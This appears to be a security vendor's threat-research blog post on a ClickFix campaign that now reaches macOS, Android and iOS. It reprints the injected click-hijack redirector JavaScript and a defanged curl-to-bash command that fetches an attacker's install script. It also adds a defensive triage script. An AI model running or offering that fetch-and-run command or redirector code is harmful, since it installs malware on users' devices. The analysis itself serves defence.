What began as a Windows-focused social engineering trick has turned into a multi-platform client-side threat. In this article, we break down a recent ClickFix variant that now targets macOS, Android, and iOS, using browser-based redirections, fake UI prompts, and even drive-by download techniques.
What is a ClickFix attack?
ClickFix attacks aren’t new. My first encounter with one was in September 2024:
A ClickFix attack is a form of targeted social engineering or client-side attack that exploits a user’s instinct to “just fix the issue.” It typically starts with a convincing message that points to a supposed problem (like a security vulnerability or repo issue). The user is urged to click a link or run a command, believing they're resolving something important.
In this attack example, the user is requested to run a script in the terminal. On Windows, that meant PowerShell. Naturally, the same technique works on macOS and Linux too. And just like with Windows, I assumed users wouldn’t fall for it.
Assumptions, however, are a dangerous game in cybersecurity, as was unfortunately proven once again.
We are c/side, and we monitor client-side, third-party JavaScript attacks. In the past three months alone, we've observed over 300K compromised websites.
Interestingly, this is the second time we’re breaking the news of attackers evolving their TTPs (Tactics, Techniques, and Procedures).
But what was once a Windows-only threat is now targeting other operating systems as well.
The attack in detail
We received an alert for JavaScript downloaded from:
hxxps://idjhvn4m[.]pro?h=7bd350a4ed55a8faf2e45301d70d2&user=16
The delivered script:
```javascript
(function () {
  // Read the compromised page's canonical URL and title from its Open Graph meta tags
  var sitename = document.querySelector("meta[property='og:url']").getAttribute("content");
  const mysite = new URL(sitename);
  const mysitename = `${mysite.protocol}//${mysite.hostname}`;
  var mytitle = document.querySelector("meta[property='og:title']").getAttribute("content");
  // Turn the page title into a hyphenated keyword slug
  var xtitle_spe = mytitle.replace(/[&\/\\#, +()$~%.'":*?<>{}]/g, '-');
  var xtitle_spa = xtitle_spe.replace(/\s+/g, '-');
  // Attacker-controlled template URL; {KEYWORD} becomes the slug
  // ({site} never appears in the template, so that second replace is a no-op)
  var oldurl = 'https://kbmljxm.com/?s={KEYWORD}&p=16';
  var final_url_1 = oldurl.replace('{KEYWORD}', xtitle_spa);
  var final_url_2 = final_url_1.replace('{site}', mysitename);
  var id = 16;
  var successResponse = final_url_2;
  // Hijack every element carrying the injected class: a click opens the redirect URL in a new tab
  var elements = document.getElementsByClassName("buttonPress-" + 16);
  for (var i = 0; i < elements.length; i++) {
    var anchor = elements[i];
    anchor.onclick = function () {
      window.open(successResponse, '_blank');
    };
  }
})();
```
This JavaScript is not highly obfuscated, which is uncommon in these kinds of attacks. It creates a click handler for elements with a specific class name that opens a URL in a new tab when clicked. Here's what it does:
- Takes a template URL (hxxps://kbmljxm[.]com/?s={KEYWORD}&p=16)
- Replaces {KEYWORD} with the processed page title
- Attaches click handlers to all elements with the class buttonPress-16
- When clicked, these elements open the constructed URL in a new tab
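To triage scripts like this one at scale, the following Node.js snippet (an added example, not c/side's detection code) matches a fetched script against the behaviours listed above and pulls out the hardcoded hosts for blocklisting. The two sample inputs are constructed: an abridged copy of the delivered script and a benign share-button handler.

```javascript
// Added example, not part of the original post: static triage of a fetched script
// for the click-hijack redirector pattern. Runs under Node.js with no dependencies.

// One regex per behaviour observed in the delivered script.
const INDICATORS = [
  { name: 'reads-og-meta', re: /querySelector\(\s*["']meta\[property=["']og:(url|title)["']\]["']\s*\)/ },
  { name: 'keyword-template', re: /\.replace\(\s*["']\{KEYWORD\}["']/ },
  { name: 'title-to-slug', re: /\.replace\(\s*\/\\s\+\/g\s*,\s*["']-["']\s*\)/ },
  { name: 'onclick-window-open', re: /onclick\s*=\s*function\s*\([^)]*\)\s*\{\s*window\.open\([^)]*["']_blank["']/ },
  { name: 'buttonpress-class-hook', re: /getElementsByClassName\(\s*["']buttonPress-["']/ },
];

// Returns the matched indicator names; three or more together is treated as suspicious,
// since a single hit (e.g. reading og:title) is common in legitimate share widgets.
function triageScript(src) {
  const matched = INDICATORS.filter(i => i.re.test(src)).map(i => i.name);
  return { matched, suspicious: matched.length >= 3 };
}

// Extract every absolute http(s) hostname so it can be checked against threat intel
// or added to a blocklist (hostnames only, no path or query string).
function extractHosts(src) {
  const hosts = new Set();
  for (const m of src.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) hosts.add(m[1].toLowerCase());
  return [...hosts].sort();
}

// Constructed sample: abridged copy of the redirector described in the article.
const SAMPLE_MALICIOUS = String.raw`(function () {
  var sitename = document.querySelector("meta[property='og:url']").getAttribute("content");
  var mytitle = document.querySelector("meta[property='og:title']").getAttribute("content");
  var xtitle_spa = mytitle.replace(/[&\/\\#, +()$~%.'":*?<>{}]/g, '-').replace(/\s+/g, '-');
  var oldurl = 'https://kbmljxm.com/?s={KEYWORD}&p=16';
  var successResponse = oldurl.replace('{KEYWORD}', xtitle_spa);
  var elements = document.getElementsByClassName("buttonPress-"+16);
  for (var i = 0; i < elements.length; i++) {
    elements[i].onclick = function() { window.open(successResponse, '_blank'); };
  }
})();`;

// Constructed sample: a benign share button that also reads og:title and opens a new tab.
const SAMPLE_BENIGN = String.raw`document.querySelector("meta[property='og:title']");
document.getElementById('share').onclick = function() { window.open('https://example.com/share', '_blank'); };`;

console.log(triageScript(SAMPLE_MALICIOUS), extractHosts(SAMPLE_MALICIOUS));
console.log(triageScript(SAMPLE_BENIGN));
```

The benign sample trips two indicators but stays below the threshold, which is why the verdict is based on the combination rather than any single regex.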
Below is the redirection chain:
Redirection Chain on UI
The page appears like a URL shortener and asks the user to copy a link. The attackers are abusing cutt[.]ly, a legitimate URL shortener.
When a user pastes the shortened URL into the browser, it redirects them to:
This mimicked URL shortener page brings the following pop-up:
“Paste the link you copied into the address line of the browser.”
It then redirects the user to a download page (in this case for macOS):
/bin/bash -c "$(curl -fsSL hxxps://vuwzer[.]com/get/install.sh)"
The content of this shell file is shown in the screenshot below:
This shell script then downloads a macOS executable (detected by 10 antivirus engines on VirusTotal).
Android and iOS Behavior
When we tested this on Android and iOS, we expected a ClickFix variant. But instead, we encountered a drive-by attack.
A drive-by attack is a type of cyberattack where malicious code is executed or downloaded onto a device simply by visiting a compromised or malicious webpage. No clicks, installs, or interaction required.
The page now redirected us to:
hxxps://iteslawow[.]com/?=ijn&diu=16&sid=npT
This site downloaded a .tar file (a password-protected 7zip archive) that extracted and dropped the malware, detected by 5 vendors on VirusTotal.
This drive-by attack style was used on both Android and Windows.
This is a fascinating and evolving attack that demonstrates how attackers are expanding their reach. What started as a Windows-specific ClickFix campaign is now targeting macOS, Android, and iOS, significantly expanding the scale of the operation.
It's yet another reminder of how quickly client-side attacks are spreading and of the many forms they can take, all by exploiting the trust users place in browser interactions.